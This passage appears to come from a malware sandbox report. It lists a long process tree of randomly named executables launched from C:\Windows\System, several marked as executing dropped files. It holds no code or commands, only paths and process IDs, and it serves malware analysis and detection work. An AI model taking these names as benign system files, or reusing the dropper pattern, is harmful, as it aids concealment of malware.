  C:\Windows\System\mehzWly.exe
  2⤵
  - Executes dropped EXE
  PID:3868
- C:\Windows\System\PGXefIu.exe
  C:\Windows\System\PGXefIu.exe
  2⤵
  - Executes dropped EXE
  PID:3664
- C:\Windows\System\EgyafCw.exe
  C:\Windows\System\EgyafCw.exe
  2⤵
  - Executes dropped EXE
  PID:1016
- C:\Windows\System\egqqrow.exe
  C:\Windows\System\egqqrow.exe
  2⤵
  - Executes dropped EXE
  PID:3792
- C:\Windows\System\xjOCTks.exe
  C:\Windows\System\xjOCTks.exe
  2⤵
  - Executes dropped EXE
  PID:2328
- C:\Windows\System\GlloeWN.exe
  C:\Windows\System\GlloeWN.exe
  2⤵
  - Executes dropped EXE
  PID:4752
- C:\Windows\System\HMUolRA.exe
  C:\Windows\System\HMUolRA.exe
  2⤵
  - Executes dropped EXE
  PID:1304
- C:\Windows\System\qVoPArx.exe
  C:\Windows\System\qVoPArx.exe
  2⤵
  - Executes dropped EXE
  PID:1716
- C:\Windows\System\NgUhyJl.exe
  C:\Windows\System\NgUhyJl.exe
  2⤵
  - Executes dropped EXE
  PID:508
- C:\Windows\System\ejeVJZN.exe
  C:\Windows\System\ejeVJZN.exe
  2⤵
  - Executes dropped EXE
  PID:4560
- C:\Windows\System\ghAPOWO.exe
  C:\Windows\System\ghAPOWO.exe
  2⤵
  - Executes dropped EXE
  PID:4464
- C:\Windows\System\EAYzEQr.exe
  C:\Windows\System\EAYzEQr.exe
  2⤵
  - Executes dropped EXE
  PID:1984
- C:\Windows\System\tNARCvz.exe
  C:\Windows\System\tNARCvz.exe
  2⤵
  - Executes dropped EXE
  PID:3260
- C:\Windows\System\sQNuTLe.exe
  C:\Windows\System\sQNuTLe.exe
  2⤵
  - Executes dropped EXE
  PID:3048
- C:\Windows\System\SbFlwXD.exe
  C:\Windows\System\SbFlwXD.exe
  2⤵
  - Executes dropped EXE
  PID:3840
- C:\Windows\System\okbTcgt.exe
  C:\Windows\System\okbTcgt.exe
  2⤵
  PID:4556
- C:\Windows\System\eweLUUH.exe
  C:\Windows\System\eweLUUH.exe
  2⤵
  PID:2524
- C:\Windows\System\QFWXwHP.exe
  C:\Windows\System\QFWXwHP.exe
  2⤵
  PID:4716
- C:\Windows\System\uzpdEos.exe
  C:\Windows\System\uzpdEos.exe
  2⤵
  PID:3892
- C:\Windows\System\rEyFSVb.exe
  C:\Windows\System\rEyFSVb.exe
  2⤵
  PID:3236
- C:\Windows\System\GoMUdvF.exe
  C:\Windows\System\GoMUdvF.exe
  2⤵
  PID:4832
- C:\Windows\System\fERAcoI.exe
  C:\Windows\System\fERAcoI.exe
  2⤵
  PID:3096
- C:\Windows\System\rfhdDRW.exe
  C:\Windows\System\rfhdDRW.exe
  2⤵
  PID:752
- C:\Windows\System\rjaZbSe.exe
  C:\Windows\System\rjaZbSe.exe
  2⤵
  PID:5124
- C:\Windows\System\QlJPdNZ.exe
  C:\Windows\System\QlJPdNZ.exe
  2⤵
  PID:5152
- C:\Windows\System\mImOuBc.exe
  C:\Windows\System\mImOuBc.exe
  2⤵
  PID:5180
- C:\Windows\System\thYwDir.exe
  C:\Windows\System\thYwDir.exe
  2⤵
  PID:5204
- C:\Windows\System\OSOIcWV.exe
  C:\Windows\System\OSOIcWV.exe
  2⤵
  PID:5232
- C:\Windows\System\mpEjOUt.exe
  C:\Windows\System\mpEjOUt.exe
  2⤵
  PID:5260
- C:\Windows\System\uDFKBKf.exe
  C:\Windows\System\uDFKBKf.exe
  2⤵
  PID:5292
- C:\Windows\System\XftORnS.exe
  C:\Windows\System\XftORnS.exe
  2⤵
  PID:5320
- C:\Windows\System\zyjJYIE.exe
  C:\Windows\System\zyjJYIE.exe
  2⤵
  PID:5348
- C:\Windows\System\GeOAMLX.exe
  C:\Windows\System\GeOAMLX.exe
  2⤵
  PID:5376
- C:\Windows\System\FpUZtKe.exe
  C:\Windows\System\FpUZtKe.exe
  2⤵
  PID:5404
- C:\Windows\System\eunYgOy.exe
  C:\Windows\System\eunYgOy.exe
  2⤵
  PID:5432
- C:\Windows\System\csawfNj.exe
  C:\Windows\System\csawfNj.exe
  2⤵
  PID:5460
- C:\Windows\System\jRDrwvS.exe
  C:\Windows\System\jRDrwvS.exe
  2⤵
  PID:5488
- C:\Windows\System\iHPMqQv.exe
  C:\Windows\System\iHPMqQv.exe
  2⤵
  PID:5516
- C:\Windows\System\YfDsbxZ.exe
  C:\Windows\System\YfDsbxZ.exe
  2⤵
  PID:5544
- C:\Windows\System\wfnDfcw.exe
  C:\Windows\System\wfnDfcw.exe
  2⤵
  PID:5572
- C:\Windows\System\UlwCwuj.exe
  C:\Windows\System\UlwCwuj.exe
  2⤵
  PID:5600
- C:\Windows\System\uYytqiq.exe
  C:\Windows\System\uYytqiq.exe
  2⤵
  PID:5628
- C:\Windows\System\hGAgycL.exe
  C:\Windows\System\hGAgycL.exe
  2⤵
  PID:5656
- C:\Windows\System\aNSGRfg.exe
  C:\Windows\System\aNSGRfg.exe
  2⤵
  PID:5684
- C:\Windows\System\uYTLmZc.exe
  C:\Windows\System\uYTLmZc.exe
  2⤵
  PID:5712
- C:\Windows\System\QZCoUnP.exe
  C:\Windows\System\QZCoUnP.exe
  2⤵
  PID:5740
- C:\Windows\System\QuWxtVp.exe
  C:\Windows\System\QuWxtVp.exe
  2⤵
  PID:5768
- C:\Windows\System\rcOrWhU.exe
  C:\Windows\System\rcOrWhU.exe
  2⤵
  PID:5796
- C:\Windows\System\UFKsWer.exe
  C:\Windows\System\UFKsWer.exe
  2⤵
  PID:5824
- C:\Windows\System\fNZQqkh.exe
  C:\Windows\System\fNZQqkh.exe
  2⤵
  PID:5852
- C:\Windows\System\qBzPDVE.exe
  C:\Windows\System\qBzPDVE.exe
  2⤵
  PID:5880
- C:\Windows\System\dBrboIi.exe
  C:\Windows\System\dBrboIi.exe
  2⤵
  PID:5908
- C:\Windows\System\vDXRJwr.exe
  C:\Windows\System\vDXRJwr.exe
  2⤵
  PID:5936
- C:\Windows\System\KhyTQeZ.exe
  C:\Windows\System\KhyTQeZ.exe
  2⤵
  PID:5964
- C:\Windows\System\AVRrPPA.exe
  C:\Windows\System\AVRrPPA.exe
  2⤵
  PID:5992
- C:\Windows\System\mYrAwzM.exe
  C:\Windows\System\mYrAwzM.exe
  2⤵
  PID:6020
- C:\Windows\System\mPcnMfW.exe
  C:\Windows\System\mPcnMfW.exe
  2⤵
  PID:6048
- C:\Windows\System\jwsvumj.exe
  C:\Windows\System\jwsvumj.exe
  2⤵
  PID:6076
- C:\Windows\System\UDARHyK.exe
  C:\Windows\System\UDARHyK.exe
  2⤵
  PID:6104
- C:\Windows\System\tBnPtgl.exe
  C:\Windows\System\tBnPtgl.exe
  2⤵
  PID:6132
- C:\Windows\System\GSYKbpL.exe
  C:\Windows\System\GSYKbpL.exe
  2⤵
  PID:4632
- C:\Windows\System\BcTOSWG.exe
  C:\Windows\System\BcTOSWG.exe
  2⤵
  PID:3616
- C:\Windows\System\LxZYxyG.exe
  C:\Windows\System\LxZYxyG.exe
  2⤵
  PID:4612
- C:\Windows\System\qLVTBfb.exe
  C:\Windows\System\qLVTBfb.exe
  2⤵
  PID:1608
- C:\Windows\System\biynnpi.exe
  C:\Windows\System\biynnpi.exe
  2⤵
  PID:5140
- C:\Windows\System\shQcgwJ.exe
  C:\Windows\System\shQcgwJ.exe
  2⤵
  PID:5200
- C:\Windows\System\LjhNbzz.exe
  C:\Windows\System\LjhNbzz.exe
  2⤵
  PID:5276
- C:\Windows\System\OEtiAkj.exe
  C:\Windows\System\OEtiAkj.exe
  2⤵
  PID:3764
- C:\Windows\System\pOJZbDv.exe
  C:\Windows\System\pOJZbDv.exe
  2⤵
  PID:5392
- C:\Windows\System\dmFpbBC.exe
  C:\Windows\System\dmFpbBC.exe
  2⤵
  PID:5452
- C:\Windows\System\FAWXUTT.exe
  C:\Windows\System\FAWXUTT.exe
  2⤵
  PID:5528
- C:\Windows\System\JQVaRWj.exe
  C:\Windows\System\JQVaRWj.exe
  2⤵
  PID:5588
- C:\Windows\System\KUnmFDV.exe
  C:\Windows\System\KUnmFDV.exe
  2⤵
  PID:5640
- C:\Windows\System\usNwYoe.exe
  C:\Windows\System\usNwYoe.exe
  2⤵
  PID:5700
- C:\Windows\System\ZYpZHVe.exe
  C:\Windows\System\ZYpZHVe.exe
  2⤵
  PID:5760
- C:\Windows\System\hnGawUJ.exe
  C:\Windows\System\hnGawUJ.exe
  2⤵
  PID:5836
- C:\Windows\System\tPIgxqw.exe
  C:\Windows\System\tPIgxqw.exe
  2⤵
  PID:5892
- C:\Windows\System\sDIBwya.exe
  C:\Windows\System\sDIBwya.exe
  2⤵
  PID:5952
- C:\Windows\System\kaqLnLK.exe
  C:\Windows\System\kaqLnLK.exe
  2⤵
  PID:6012
- C:\Windows\System\TXkAHsj.exe
  C:\Windows\System\TXkAHsj.exe
  2⤵
  PID:6088
- C:\Windows\System\dZbVjJM.exe
  C:\Windows\System\dZbVjJM.exe
  2⤵
  PID:4720
- C:\Windows\System\NshgryT.exe
  C:\Windows\System\NshgryT.exe
  2⤵
  PID:4600
- C:\Windows\System\AbMBNQc.exe
  C:\Windows\System\AbMBNQc.exe
  2⤵
  PID:5172
- C:\Windows\System\EkPWVsN.exe
  C:\Windows\System\EkPWVsN.exe
  2⤵
  PID:5312
- C:\Windows\System\gGCaDoc.exe
  C:\Windows\System\gGCaDoc.exe
  2⤵
  PID:2388
- C:\Windows\System\wQWqZGu.exe
  C:\Windows\System\wQWqZGu.exe
  2⤵
  PID:5560
- C:\Windows\System\ywzJJHV.exe
  C:\Windows\System\ywzJJHV.exe
  2⤵
  PID:5676
- C:\Windows\System\czGVSMw.exe
  C:\Windows\System\czGVSMw.exe
  2⤵
  PID:5864
- C:\Windows\System\EdBTXAR.exe
  C:\Windows\System\EdBTXAR.exe
  2⤵
  PID:5980
- C:\Windows\System\NERNhiB.exe
  C:\Windows\System\NERNhiB.exe
  2⤵
  PID:6120
- C:\Windows\System\EQkGacE.exe
  C:\Windows\System\EQkGacE.exe
  2⤵
  PID:2404
- C:\Windows\System\gbrVyWD.exe
  C:\Windows\System\gbrVyWD.exe
  2⤵
  PID:6164
- C:\Windows\System\lPczoxP.exe
  C:\Windows\System\lPczoxP.exe
  2⤵
  PID:6192
- C:\Windows\System\UerEVvD.exe
  C:\Windows\System\UerEVvD.exe
  2⤵
  PID:6220
- C:\Windows\System\rLylCOU.exe
  C:\Windows\System\rLylCOU.exe
  2⤵
  PID:6248
- C:\Windows\System\aeRfLjU.exe
  C:\Windows\System\aeRfLjU.exe
  2⤵
  PID:6276
- C:\Windows\System\VDYGUad.exe
  C:\Windows\System\VDYGUad.exe
  2⤵
  PID:6304
- C:\Windows\System\cpGAGcm.exe
  C:\Windows\System\cpGAGcm.exe
  2⤵
  PID:6332
- C:\Windows\System\mdBcogG.exe
  C:\Windows\System\mdBcogG.exe
  2⤵
  PID:6360
- C:\Windows\System\knQkiRZ.exe
  C:\Windows\System\knQkiRZ.exe
  2⤵
  PID:6388
- C:\Windows\System\sFtiTwj.exe
  C:\Windows\System\sFtiTwj.exe
  2⤵
  PID:6416
- C:\Windows\System\AOFAZWX.exe
  C:\Windows\System\AOFAZWX.exe
  2⤵
  PID:6444
- C:\Windows\System\sMmAVOW.exe
  C:\Windows\System\sMmAVOW.exe
  2⤵
  PID:6472
- C:\Windows\System\bwtlkSl.exe
  C:\Windows\System\bwtlkSl.exe
  2⤵
  PID:6496
- C:\Windows\System\iFKftUy.exe
  C:\Windows\System\iFKftUy.exe
  2⤵
  PID:6528
- C:\Windows\System\uAsAWZP.exe
  C:\Windows\System\uAsAWZP.exe
  2⤵
  PID:6556
- C:\Windows\System\QvjAfGL.exe
  C:\Windows\System\QvjAfGL.exe
  2⤵
  PID:6584
- C:\Windows\System\RdQDFNw.exe
  C:\Windows\System\RdQDFNw.exe
  2⤵
  PID:6612
- C:\Windows\System\KYttNzw.exe
  C:\Windows\System\KYttNzw.exe
  2⤵
  PID:6636
- C:\Windows\System\qVZvYgM.exe
  C:\Windows\System\qVZvYgM.exe
  2⤵
  PID:6668
- C:\Windows\System\bpubgFg.exe
  C:\Windows\System\bpubgFg.exe
  2⤵
  PID:6696
- C:\Windows\System\zDXdfuH.exe
  C:\Windows\System\zDXdfuH.exe
  2⤵
  PID:6724
- C:\Windows\System\pAcQlwR.exe
  C:\Windows\System\pAcQlwR.exe
  2⤵
  PID:6752
- C:\Windows\System\OpFrjMb.exe
  C:\Windows\System\OpFrjMb.exe
  2⤵
  PID:6780
- C:\Windows\System\KwOsSCR.exe
  C:\Windows\System\KwOsSCR.exe
  2⤵
  PID:6808
- C:\Windows\System\SZvzQjw.exe
  C:\Windows\System\SZvzQjw.exe
  2⤵
  PID:6836
- C:\Windows\System\KdcgZSK.exe
  C:\Windows\System\KdcgZSK.exe
  2⤵
  PID:6864
- C:\Windows\System\jzYIlbe.exe
  C:\Windows\System\jzYIlbe.exe
  2⤵
  PID:6892
- C:\Windows\System\iILMkjR.exe
  C:\Windows\System\iILMkjR.exe
  2⤵
  PID:6920
- C:\Windows\System\Xupaskt.exe
  C:\Windows\System\Xupaskt.exe
  2⤵
  PID:6948
- C:\Windows\System\yOLiwHa.exe
  C:\Windows\System\yOLiwHa.exe
  2⤵
  PID:6976
- C:\Windows\System\GaGtKac.exe
  C:\Windows\System\GaGtKac.exe
  2⤵
  PID:7004
- C:\Windows\System\CUzubru.exe
  C:\Windows\System\CUzubru.exe
  2⤵
  PID:7032
- C:\Windows\System\abdqjCp.exe
  C:\Windows\System\abdqjCp.exe
  2⤵
  PID:7060
- C:\Windows\System\kpeNtdY.exe
  C:\Windows\System\kpeNtdY.exe
  2⤵
  PID:7088
- C:\Windows\System\QrtcFEC.exe
  C:\Windows\System\QrtcFEC.exe
  2⤵
  PID:7116
- C:\Windows\System\HJMeLUU.exe
  C:\Windows\System\HJMeLUU.exe
  2⤵
  PID:7144
- C:\Windows\System\SDvKSIc.exe
  C:\Windows\System\SDvKSIc.exe
  2⤵
  PID:5304
- C:\Windows\System\lMgWPhH.exe
  C:\Windows\System\lMgWPhH.exe
  2⤵
  PID:5616
- C:\Windows\System\lqyFtsj.exe
  C:\Windows\System\lqyFtsj.exe
  2⤵
  PID:1264
- C:\Windows\System\RpwhBWf.exe
  C:\Windows\System\RpwhBWf.exe
  2⤵
  PID:4584
- C:\Windows\System\zeRGQQy.exe
  C:\Windows\System\zeRGQQy.exe
  2⤵
  PID:6184
- C:\Windows\System\oybWjVs.exe
  C:\Windows\System\oybWjVs.exe
  2⤵
  PID:6260
- C:\Windows\System\GHmkSeB.exe
  C:\Windows\System\GHmkSeB.exe
  2⤵
  PID:6316
- C:\Windows\System\OieIuNF.exe
  C:\Windows\System\OieIuNF.exe
  2⤵
  PID:6372
- C:\Windows\System\eYxeGDi.exe
  C:\Windows\System\eYxeGDi.exe
  2⤵
  PID:6428
- C:\Windows\System\cfUdLZo.exe
  C:\Windows\System\cfUdLZo.exe
  2⤵
  PID:6484
- C:\Windows\System\zLNrOUq.exe
  C:\Windows\System\zLNrOUq.exe
  2⤵
  PID:6544
- C:\Windows\System\rfVsDOh.exe
  C:\Windows\System\rfVsDOh.exe
  2⤵
  PID:3068
- C:\Windows\System\ucNNzQL.exe
  C:\Windows\System\ucNNzQL.exe
  2⤵
  PID:6652
- C:\Windows\System\wVUtoLv.exe
  C:\Windows\System\wVUtoLv.exe
  2⤵
  PID:3952
- C:\Windows\System\PLztLQH.exe
  C:\Windows\System\PLztLQH.exe
  2⤵
  PID:6716
- C:\Windows\System\rxGBoqZ.exe
  C:\Windows\System\rxGBoqZ.exe
  2⤵
  PID:6792
- C:\Windows\System\lHpeOKc.exe
  C:\Windows\System\lHpeOKc.exe
  2⤵
  PID:6904
- C:\Windows\System\tJBSqFc.exe
  C:\Windows\System\tJBSqFc.exe
  2⤵
  PID:6964
- C:\Windows\System\mBRJLEz.exe
  C:\Windows\System\mBRJLEz.exe
  2⤵
  PID:4868
- C:\Windows\System\meEPGHO.exe
  C:\Windows\System\meEPGHO.exe
  2⤵
  PID:7024
- C:\Windows\System\ynCKDHP.exe
  C:\Windows\System\ynCKDHP.exe
  2⤵
  PID:7076
- C:\Windows\System\UpHOird.exe
  C:\Windows\System\UpHOird.exe
  2⤵
  PID:3328
- C:\Windows\System\UlKBzNd.exe
  C:\Windows\System\UlKBzNd.exe
  2⤵
  PID:2240
- C:\Windows\System\mUNgNyP.exe
  C:\Windows\System\mUNgNyP.exe
  2⤵
  PID:5752
- C:\Windows\System\Neypjbb.exe
  C:\Windows\System\Neypjbb.exe
  2⤵
  PID:6212
- C:\Windows\System\puulpnh.exe
  C:\Windows\System\puulpnh.exe
  2⤵
  PID:6288
- C:\Windows\System\NGGryOO.exe
  C:\Windows\System\NGGryOO.exe
  2⤵
  PID:6352
- C:\Windows\System\eTMVmTH.exe
  C:\Windows\System\eTMVmTH.exe
  2⤵
  PID:4380
- C:\Windows\System\EduVUTB.exe
  C:\Windows\System\EduVUTB.exe
  2⤵
  PID:6520
- C:\Windows\System\LJAczFC.exe
  C:\Windows\System\LJAczFC.exe
  2⤵
  PID:3832
- C:\Windows\System\ZZBLJuo.exe
  C:\Windows\System\ZZBLJuo.exe
  2⤵
  PID:3444
- C:\Windows\System\rOPTdJi.exe
  C:\Windows\System\rOPTdJi.exe
  2⤵
  PID:2876
- C:\Windows\System\HGDDaBK.exe
  C:\Windows\System\HGDDaBK.exe
  2⤵
  PID:4312
- C:\Windows\System\BujrvoL.exe
  C:\Windows\System\BujrvoL.exe
  2⤵
  PID:6680
- C:\Windows\System\rQVORbG.exe
  C:\Windows\System\rQVORbG.exe
  2⤵
  PID:6624
- C:\Windows\System\ZTEsjIj.exe
  C:\Windows\System\ZTEsjIj.exe
  2⤵
  PID:2332
- C:\Windows\System\hBbfEpA.exe
  C:\Windows\System\hBbfEpA.exe
  2⤵
  PID:6940
- C:\Windows\System\IBzraCN.exe
  C:\Windows\System\IBzraCN.exe
  2⤵
  PID:7132
- C:\Windows\System\QUkpLuZ.exe
  C:\Windows\System\QUkpLuZ.exe
  2⤵
  PID:5504
- C:\Windows\System\AHSPaKS.exe
  C:\Windows\System\AHSPaKS.exe
  2⤵
  PID:2896
- C:\Windows\System\IuroWSj.exe
  C:\Windows\System\IuroWSj.exe
  2⤵
  PID:6404
- C:\Windows\System\YvOKgmN.exe
  C:\Windows\System\YvOKgmN.exe
  2⤵
  PID:6764
- C:\Windows\System\XCniJJj.exe
  C:\Windows\System\XCniJJj.exe
  2⤵
  PID:3060
- C:\Windows\System\GEtNIaw.exe
  C:\Windows\System\GEtNIaw.exe
  2⤵
  PID:1052
- C:\Windows\System\Yrgnzjs.exe
  C:\Windows\System\Yrgnzjs.exe
  2⤵
  PID:3992
- C:\Windows\System\YIywdvB.exe
  C:\Windows\System\YIywdvB.exe
  2⤵
  PID:3360
- C:\Windows\System\mZEIgXL.exe
  C:\Windows\System\mZEIgXL.exe
  2⤵
  PID:3932
- C:\Windows\System\CiEAzAW.exe
  C:\Windows\System\CiEAzAW.exe
  2⤵
  PID:6824
- C:\Windows\System\eqrQVVM.exe
  C:\Windows\System\eqrQVVM.exe
  2⤵
  PID:2228
- C:\Windows\System\MtvSTbb.exe
  C:\Windows\System\MtvSTbb.exe
  2⤵
  PID:5064
- C:\Windows\System\ZPNlnYU.exe
  C:\Windows\System\ZPNlnYU.exe
  2⤵
  PID:1456
- C:\Windows\System\sMRaCCk.exe
  C:\Windows\System\sMRaCCk.exe
  2⤵
  PID:7180
- C:\Windows\System\BOxnsWR.exe
  C:\Windows\System\BOxnsWR.exe
  2⤵
  PID:7208
- C:\Windows\System\QwdMuqM.exe
  C:\Windows\System\QwdMuqM.exe
  2⤵
  PID:7228
- C:\Windows\System\umDRfOs.exe
  C:\Windows\System\umDRfOs.exe
  2⤵
  PID:7252
- C:\Windows\System\sQjJMTZ.exe
  C:\Windows\System\sQjJMTZ.exe
  2⤵
  PID:7268
- C:\Windows\System\Ovjudiz.exe
  C:\Windows\System\Ovjudiz.exe
  2⤵
  PID:7320
- C:\Windows\System\TSDsXWm.exe
  C:\Windows\System\TSDsXWm.exe
  2⤵
  PID:7352
- C:\Windows\System\GrquRrZ.exe
  C:\Windows\System\GrquRrZ.exe
  2⤵
  PID:7372
- C:\Windows\System\PZxQnZn.exe
  C:\Windows\System\PZxQnZn.exe
  2⤵
  PID:7392
- C:\Windows\System\AbMAEYJ.exe
  C:\Windows\System\AbMAEYJ.exe
  2⤵
  PID:7424
- C:\Windows\System\tiPEscW.exe
  C:\Windows\System\tiPEscW.exe
  2⤵
  PID:7452
- C:\Windows\System\GKvUzos.exe
  C:\Windows\System\GKvUzos.exe
  2⤵
  PID:7476
- C:\Windows\System\wSYEfXK.exe
  C:\Windows\System\wSYEfXK.exe
  2⤵
  PID:7524
- C:\Windows\System\drMCsOS.exe
  C:\Windows\System\drMCsOS.exe
  2⤵
  PID:7564
- C:\Windows\System\PtlZdWH.exe
  C:\Windows\System\PtlZdWH.exe
  2⤵
  PID:7584
- C:\Windows\System\zizZbMY.exe
  C:\Windows\System\zizZbMY.exe
  2⤵
  PID:7608
- C:\Windows\System\VzaujHt.exe
  C:\Windows\System\VzaujHt.exe
  2⤵
  PID:7636
- C:\Windows\System\cyHAvYM.exe
  C:\Windows\System\cyHAvYM.exe
  2⤵
  PID:7660
- C:\Windows\System\lOJTNQb.exe
  C:\Windows\System\lOJTNQb.exe
  2⤵
  PID:7684
- C:\Windows\System\mDaIlRC.exe
  C:\Windows\System\mDaIlRC.exe
  2⤵
  PID:7712
- C:\Windows\System\lqLYWgs.exe
  C:\Windows\System\lqLYWgs.exe
  2⤵
  PID:7740
- C:\Windows\System\LPQQcyD.exe
  C:\Windows\System\LPQQcyD.exe
  2⤵
  PID:7784
- C:\Windows\System\SUjYTDq.exe
  C:\Windows\System\SUjYTDq.exe
  2⤵
  PID:7804
- C:\Windows\System\wNvtenO.exe
  C:\Windows\System\wNvtenO.exe
  2⤵
  PID:7824
- C:\Windows\System\BaNUdJZ.exe
  C:\Windows\System\BaNUdJZ.exe
  2⤵
  PID:7848
- C:\Windows\System\EzKWQpo.exe
  C:\Windows\System\EzKWQpo.exe
  2⤵
  PID:7892
- C:\Windows\System\qbLncir.exe
  C:\Windows\System\qbLncir.exe
  2⤵
  PID:7916
- C:\Windows\System\cXpOVIe.exe
  C:\Windows\System\cXpOVIe.exe
  2⤵
  PID:7948
- C:\Windows\System\btHBUOH.exe
  C:\Windows\System\btHBUOH.exe
  2⤵
  PID:7972
- C:\Windows\System\mmtaCud.exe
  C:\Windows\System\mmtaCud.exe
  2⤵
  PID:8012
- C:\Windows\System\xPhePqI.exe
  C:\Windows\System\xPhePqI.exe
  2⤵
  PID:8028
- C:\Windows\System\UYWhHuj.exe
  C:\Windows\System\UYWhHuj.exe
  2⤵
  PID:8068
- C:\Windows\System\GGrBRPS.exe
  C:\Windows\System\GGrBRPS.exe
  2⤵
  PID:8096
- C:\Windows\System\RLeGjGs.exe
  C:\Windows\System\RLeGjGs.exe
  2⤵
  PID:8124
- C:\Windows\System\DIkyWEX.exe
  C:\Windows\System\DIkyWEX.exe
  2⤵
  PID:8144
- C:\Windows\System\qeSdJPq.exe
  C:\Windows\System\qeSdJPq.exe
  2⤵
  PID:8176
- C:\Windows\System\ztKGIMx.exe
  C:\Windows\System\ztKGIMx.exe
  2⤵
  PID:7188
- C:\Windows\System\XCVLkFF.exe
  C:\Windows\System\XCVLkFF.exe
  2⤵
  PID:7216
- C:\Windows\System\WphbxWV.exe
  C:\Windows\System\WphbxWV.exe
  2⤵
  PID:7288
- C:\Windows\System\JGtYKrn.exe
  C:\Windows\System\JGtYKrn.exe
  2⤵
  PID:7360
- C:\Windows\System\aqwePFn.exe
  C:\Windows\System\aqwePFn.exe
  2⤵
  PID:7400
- C:\Windows\System\wymNoHS.exe
  C:\Windows\System\wymNoHS.exe
  2⤵
  PID:7416
- C:\Windows\System\DbLqqLr.exe
  C:\Windows\System\DbLqqLr.exe
  2⤵
  PID:7552
- C:\Windows\System\gkTEmPi.exe
  C:\Windows\System\gkTEmPi.exe
  2⤵
  PID:7604
- C:\Windows\System\UeHBKzL.exe
  C:\Windows\System\UeHBKzL.exe
  2⤵
  PID:7652
- C:\Windows\System\fDojDUJ.exe
  C:\Windows\System\fDojDUJ.exe
  2⤵
  PID:7760
- C:\Windows\System\OgdHxfF.exe
  C:\Windows\System\OgdHxfF.exe
  2⤵
  PID:7832
- C:\Windows\System\LwawzRx.exe
  C:\Windows\System\LwawzRx.exe
  2⤵
  PID:7844
- C:\Windows\System\LiKaAuC.exe
  C:\Windows\System\LiKaAuC.exe
  2⤵
  PID:7904
- C:\Windows\System\zgEdMWm.exe
  C:\Windows\System\zgEdMWm.exe
  2⤵
  PID:7956
- C:\Windows\System\CFFBFHA.exe
  C:\Windows\System\CFFBFHA.exe
  2⤵
  PID:8048
- C:\Windows\System\XDCLDAI.exe
  C:\Windows\System\XDCLDAI.exe
  2⤵
  PID:8140
- C:\Windows\System\FYkBqLK.exe
  C:\Windows\System\FYkBqLK.exe
  2⤵
  PID:8184
- C:\Windows\System\zAVwQEf.exe
  C:\Windows\System\zAVwQEf.exe
  2⤵
  PID:7244
- C:\Windows\System\OLsxqkg.exe
  C:\Windows\System\OLsxqkg.exe
  2⤵
  PID:7444
- C:\Windows\System\snQUnoS.exe
  C:\Windows\System\snQUnoS.exe
  2⤵
  PID:7504
- C:\Windows\System\bhqIaYf.exe
  C:\Windows\System\bhqIaYf.exe
  2⤵
  PID:7648
- C:\Windows\System\AnimTOL.exe
  C:\Windows\System\AnimTOL.exe
  2⤵
  PID:7796
- C:\Windows\System\lBHAWBY.exe
  C:\Windows\System\lBHAWBY.exe
  2⤵
  PID:7900
- C:\Windows\System\FtuSCID.exe
  C:\Windows\System\FtuSCID.exe
  2⤵
  PID:8004
- C:\Windows\System\elYkAYc.exe
  C:\Windows\System\elYkAYc.exe
  2⤵
  PID:7708
- C:\Windows\System\YyfEnyj.exe
  C:\Windows\System\YyfEnyj.exe
  2⤵
  PID:7988
- C:\Windows\System\WkDMjlZ.exe
  C:\Windows\System\WkDMjlZ.exe
  2⤵
  PID:7200
- C:\Windows\System\eXgnOBe.exe
  C:\Windows\System\eXgnOBe.exe
  2⤵
  PID:7632
- C:\Windows\System\GHgxazg.exe
  C:\Windows\System\GHgxazg.exe
  2⤵
  PID:8216
- C:\Windows\System\PmoCFuu.exe
  C:\Windows\System\PmoCFuu.exe
  2⤵
  PID:8244
- C:\Windows\System\oPSRQQj.exe
  C:\Windows\System\oPSRQQj.exe
  2⤵
  PID:8280
- C:\Windows\System\MtpEdio.exe
  C:\Windows\System\MtpEdio.exe
  2⤵
  PID:8300
- C:\Windows\System\HfQQaUZ.exe
  C:\Windows\System\HfQQaUZ.exe
  2⤵
  PID:8324
- C:\Windows\System\EhduiLL.exe
  C:\Windows\System\EhduiLL.exe
  2⤵
  PID:8344
- C:\Windows\System\BQdGAJh.exe
  C:\Windows\System\BQdGAJh.exe
  2⤵
  PID:8392
- C:\Windows\System\eafTOvZ.exe
  C:\Windows\System\eafTOvZ.exe
  2⤵
  PID:8432
- C:\Windows\System\yeyPYaC.exe
  C:\Windows\System\yeyPYaC.exe
  2⤵
  PID:8456
- C:\Windows\System\aMRFrbU.exe
  C:\Windows\System\aMRFrbU.exe
  2⤵
  PID:8476
- C:\Windows\System\lqINctZ.exe
  C:\Windows\System\lqINctZ.exe
  2⤵
  PID:8516
- C:\Windows\System\TpANrLr.exe
  C:\Windows\System\TpANrLr.exe
  2⤵
  PID:8540
- C:\Windows\System\xuzFeuj.exe
  C:\Windows\System\xuzFeuj.exe
  2⤵
  PID:8560
- C:\Windows\System\iIVLSva.exe
  C:\Windows\System\iIVLSva.exe
  2⤵
  PID:8584
- C:\Windows\System\ObbOSuy.exe
  C:\Windows\System\ObbOSuy.exe
  2⤵
  PID:8608
- C:\Windows\System\JnwkttF.exe
  C:\Windows\System\JnwkttF.exe
  2⤵
  PID:8632
- C:\Windows\System\gaQEGyd.exe
  C:\Windows\System\gaQEGyd.exe
  2⤵
  PID:8652
- C:\Windows\System\ipiCBBl.exe
  C:\Windows\System\ipiCBBl.exe
  2⤵
  PID:8692
- C:\Windows\System\ByLZDyM.exe
  C:\Windows\System\ByLZDyM.exe
  2⤵
  PID:8724
- C:\Windows\System\wQKspLo.exe
  C:\Windows\System\wQKspLo.exe
  2⤵
  PID:8752
- C:\Windows\System\cMRsRmR.exe
  C:\Windows\System\cMRsRmR.exe
  2⤵
  PID:8796
- C:\Windows\System\CnAHCXe.exe
  C:\Windows\System\CnAHCXe.exe
  2⤵
  PID:8812
- C:\Windows\System\lbYHiBR.exe
  C:\Windows\System\lbYHiBR.exe
  2⤵
  PID:8860
- C:\Windows\System\xIfDxrR.exe
  C:\Windows\System\xIfDxrR.exe
  2⤵
  PID:8884
- C:\Windows\System\hJFpbSz.exe
  C:\Windows\System\hJFpbSz.exe
  2⤵
  PID:8904
- C:\Windows\System\ickDwtl.exe
  C:\Windows\System\ickDwtl.exe
  2⤵
  PID:8920
- C:\Windows\System\WxKiRTp.exe
  C:\Windows\System\WxKiRTp.exe
  2⤵
  PID:8968
- C:\Windows\System\wjHFNiv.exe
  C:\Windows\System\wjHFNiv.exe
  2⤵
  PID:8988
- C:\Windows\System\wbhpbql.exe
  C:\Windows\System\wbhpbql.exe
  2⤵
  PID:9012
- C:\Windows\System\ZWBWjwp.exe
  C:\Windows\System\ZWBWjwp.exe
  2⤵
  PID:9040
- C:\Windows\System\XPitCuX.exe
  C:\Windows\System\XPitCuX.exe
  2⤵
